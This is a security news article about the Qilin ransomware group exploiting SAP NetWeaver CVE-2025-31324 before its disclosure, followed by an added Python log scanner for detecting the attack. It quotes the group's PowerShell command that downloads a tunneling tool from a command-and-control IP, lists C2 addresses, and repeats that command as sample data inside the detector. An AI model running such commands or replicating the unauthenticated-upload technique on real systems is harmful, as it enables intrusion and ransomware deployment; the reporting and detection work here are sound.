A critical vulnerability in SAP enterprise software, CVE-2025-31324, was exploited by the Russian Ransomware-as-a-Service (RaaS) group Qilin nearly three weeks before its public disclosure, according to a recent investigation.
The vulnerability, which received the highest possible CVSS score of 10.0, affects SAP NetWeaver Visual Composer, a component widely deployed in enterprise environments globally.
The flaw resides in the /developmentserver/metadatauploader endpoint, which fails to properly enforce authentication, allowing unauthenticated attackers to upload arbitrary files to servers.
The severity of this vulnerability stems from its ease of exploitation and the widespread deployment of affected SAP components in critical business infrastructure.
With no authentication required and exposure via standard HTTP/HTTPS protocols, the vulnerability creates an easily accessible attack surface. Once exploited, attackers can achieve remote code execution, potentially leading to complete system compromise and subsequent ransomware deployment.
OP Innovate analysts identified the pre-disclosure exploitation during an incident response engagement for a major global enterprise.
Their forensic investigation revealed that the attack occurred weeks before the vulnerability was publicly announced, demonstrating sophisticated intelligence-gathering capabilities by the threat actor.
While recent reports have suggested Chinese-linked APTs were behind early exploitations, OP Innovate’s analysis tied the activity directly to Qilin’s known infrastructure.
“What started as a routine post-disclosure investigation quickly evolved into a rare glimpse of zero-day exploitation in the wild,” noted the incident response team.
The discovery highlights an increasingly concerning trend where financially motivated cybercriminal groups like Qilin are leveraging zero-day vulnerabilities traditionally associated with nation-state actors.
The exploitation of CVE-2025-31324 before its disclosure demonstrates the rapidly shrinking window between vulnerability discovery and active exploitation.
Enterprise organizations using SAP systems face heightened risk as criminal groups adopt more sophisticated tactics previously reserved for advanced persistent threats.
Exploitation Chain and WebShell Deployment
The attack leveraged a misconfigured load balancer that exposed internal SAP services to the internet. Using the vulnerable /developmentserver/metadatauploader endpoint, Qilin operators uploaded multiple JSP-based webshells to the SAP IRJ directory.
These webshells, with randomized names such as randoml2.jsp, xxkmszdm.jsp, and gpfmddkh.jsp, were automatically compiled by the SAP system into executable class files, providing the attackers with remote code execution capabilities.
After establishing initial access, the attackers used the webshells to execute PowerShell commands attempting to download a SOCKS5 tunneling tool called rs64c.exe from a known Qilin command and control server at 184.174.96.74.
The command used was:
powershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:\programdata\svchost.exe
The payload was intended to establish communication with additional Qilin infrastructure at 180.131.145.73, matching indicators previously identified in an official threat intelligence bulletin (IOC_QILIN Ransomware v1.3) released by Indonesia’s National Cyber and Crypto Agency.
Fortunately, defensive controls prevented successful exploitation. The organization’s firewall blocked outbound command and control traffic, while endpoint detection and response (EDR) systems quarantined the downloaded payloads before execution.
The attackers attempted to clean up their artifacts by issuing Remove-Item commands, but the files had already been isolated by security controls.
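As an added defensive example, not taken from OP Innovate's report, the following Python script flags the observable traces of this chain in constructed sample logs: requests to the vulnerable metadatauploader endpoint, JSP files with random eight-character names directly under /irj/, and PowerShell download or Remove-Item activity aimed at a staging path under ProgramData. The log formats, the regular expressions and the eight-character name heuristic are assumptions.

```python
import re

# Constructed sample HTTP access log lines (assumed common-log format).
HTTP_LOG = [
    '203.0.113.5 - - [01/May/2025:10:01:02 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/May/2025:10:01:05 +0000] "GET /irj/xxkmszdm.jsp HTTP/1.1" 200 64',
    '198.51.100.9 - - [01/May/2025:10:02:00 +0000] "GET /irj/portal HTTP/1.1" 200 2048',
]
# Constructed sample process-creation command lines (assumed one per line).
PROC_LOG = [
    r'powershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:\programdata\svchost.exe',
    r'powershell.exe -Command Remove-Item c:\programdata\svchost.exe',
    r'powershell.exe -NoProfile -Command Get-Service',
    r'C:\Windows\System32\svchost.exe -k netsvcs',
]

HTTP_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
UPLOADER = "/developmentserver/metadatauploader"
# Heuristic (assumption): a random eight-character JSP directly under /irj/ as in the reported names.
JSP_RE = re.compile(r"^/irj/[a-z0-9]{8}\.jsp$", re.I)
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer", re.I)
OUTFILE_RE = re.compile(r"-outfile\s+(?P<dst>\S+)", re.I)
CLEANUP_RE = re.compile(r"remove-item\s+(?P<dst>\S+)", re.I)

def scan_http(lines):
    """Return (rule, source_ip, line) for requests matching the exploitation chain."""
    hits = []
    for line in lines:
        m = HTTP_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?")[0]
        if path.lower().startswith(UPLOADER):
            hits.append(("metadatauploader-request", m["src"], line))
        elif JSP_RE.match(path):
            hits.append(("irj-random-jsp", m["src"], line))
    return hits

def suspicious_destination(dst):
    """World-writable staging directory, or a system binary name outside System32."""
    d = dst.lower().strip('"\'')
    name = d.rsplit("\\", 1)[-1]
    return d.startswith(("c:\\programdata", "c:\\users\\public")) or (
        name == "svchost.exe" and "\\windows\\system32\\" not in d)

def scan_process(lines):
    """Return (rule, destination, line) for PowerShell staging and cleanup activity."""
    hits = []
    for line in lines:
        if "powershell" not in line.lower():
            continue
        m = OUTFILE_RE.search(line)
        if DOWNLOAD_RE.search(line) and m and suspicious_destination(m["dst"]):
            hits.append(("powershell-download-to-staging", m["dst"], line))
        c = CLEANUP_RE.search(line)
        if c and suspicious_destination(c["dst"]):
            hits.append(("cleanup-of-staged-payload", c["dst"], line))
    return hits
```

Both scanners are meant to run over exported logs offline; a production rule would add allow-listing for legitimate JSPs served by the portal.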
Qilin Attack Chain (Source – OP Innovate)
The investigation highlights the critical importance of defense-in-depth strategies when protecting enterprise middleware like SAP, particularly as ransomware groups increasingly target these systems using sophisticated exploitation techniques previously associated with nation-state actors.